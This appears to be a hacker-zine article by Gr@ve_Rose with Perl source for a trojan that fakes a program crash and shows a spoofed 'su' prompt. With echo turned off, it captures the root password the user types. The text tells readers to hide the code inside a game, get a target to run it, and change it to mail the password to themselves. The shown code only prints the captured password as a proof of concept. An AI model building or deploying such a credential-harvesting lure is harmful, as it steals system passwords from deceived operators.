A Password Grabbing Attempt by Gr@ve_Rose First and foremost, I would like to get something out of the way. My Rogers @Home article in 18:4 was not to tell people how to uncap their modems (as so many people e-mailed me about). It was about what I believe hacking to be: Learning. It was something to get you started on your road of learning and teaching others about computers, networks, and security. I hope it helped some people out. Now, onto the real article.... We have all heard about, or even created our own, programs that will rootkit a system. Heck, we're even satisfied if we can get access to a webserver and deface someone's site. The only problem with attacking the computer is that computers are strict. A rule is either true or false and if your program doesn't meet the criteria, then you don't get access. "What else is there besides attacking the computer?" you ask. Answer: The operator or the computer. Social engineering doesn't have to be over the phone or while you're dressed up like a Bell employee. Let's examine this a bit: Honestly (for real) how many people out there running UNIX boxes log in as "root" all the time? Do you really log in as "user" and "su" when you need to? Sure, it's good security practice, but human nature is about being lazy and if it save typing two letters and a password, then hey, all the better. This is what we're playing upon: The ineptitude, laziness, and lack of security focus of our target operator. The basis of the program is to hide another program that will e-mail you the operator's "root" password. You will have to know a little programming (or at least understand the syntaxes of basic programming) and a fair amount of UNIX technical speak. Please keep in mind that this is the first program I have ever created so you may find an easier way to tweak it. Feel free. First, modify this program to your liking. Second, create (or get the source code to) another program, like a game (the type of program doesn't matter, but something that your target wouldn't normally look at the source code of). Third, have them run the program. It seems to me (and all my UNIX friends) that we're getting a bit lax on local security. I run as "root" all the time on my laptop (and my friends log in as "root" on their boxes quite often), which is kind of hypocritical of me. I wrote this article in the hope that people will realize we, the hacking community, set the standards for UNIX security, we have to stay on top of things and not get lazy. Local security is the most protected form of security and if you've lost it, you've lost all your security. Shout-outs: Cat5, Deathstroke, Harkonen, CrtklMass, c00k, Storm_Dragon. and, of course, eXoDuS (YNBABWARL!)
# by Gr@ve_Rose
# We all know about fancy programs that take over you system
# but what about programs that rely on the ineptitude of 
# the operator? Here is the basic idea:
# 1. Start making a program, something small like a game.
# 2. Make it crash. Well, not really, just look like it crashed.
# 3. Pretend that it was a serious crash, serious enough that
#    your 'game' might do bad system things.
# 4. Get them to 'su'.
# 5. One free root password.
# Obviously if your 'game' would do something bad, your up-to-date
# wouldn't let it. But, if the person operating it doesn't know that... :)
use strict;

# Get the hostname to make it look like a real "system drop" instead
# of just typing [guest@localhost /]$
chop(my $host = `/bin/hostname`);


# Turn the echo off so it seems like they're using 'su'
system ("stty -echo");

# Make it look like the program died while making a system call
# (Feel free to make a 'real' excuse)
print "\n";
print "Error: unhandled system exception at line 10.\n";

# Like this will ever happen, but, hey, it's all about how much your
# victim doesn't know! ;)
print "Dropping you to a guest account for safety. Please 'su' back to root\n";

# Make some apologetic reason that your 'program' died
print "Yeah, this program needs to be fixed. Sorry for the inconvenience.\n";
print "\n";

# One 'real' system prompt calling 'su' coming up....
print "[guest@";
print "$host /]\$ su ";
print "\n";
print "password:";

# Come to daddy
my $command = <STDIN>;

# Change the following lines to mail the password to you
# You'll need to add a few things like full hostname and, hopefully,
# an IP address
system ("clear");
print "\n";
print "Your root password is: $command\n";
print "Thankfully this is just a proof-of-concept program.\n";
print "You may want to be more cautious in the future.\n";
print "\n";
print "Gr\@ve_Rose\n";
print "\n";

# Turn echo back on so we can see what we are typing
system ("stty echo");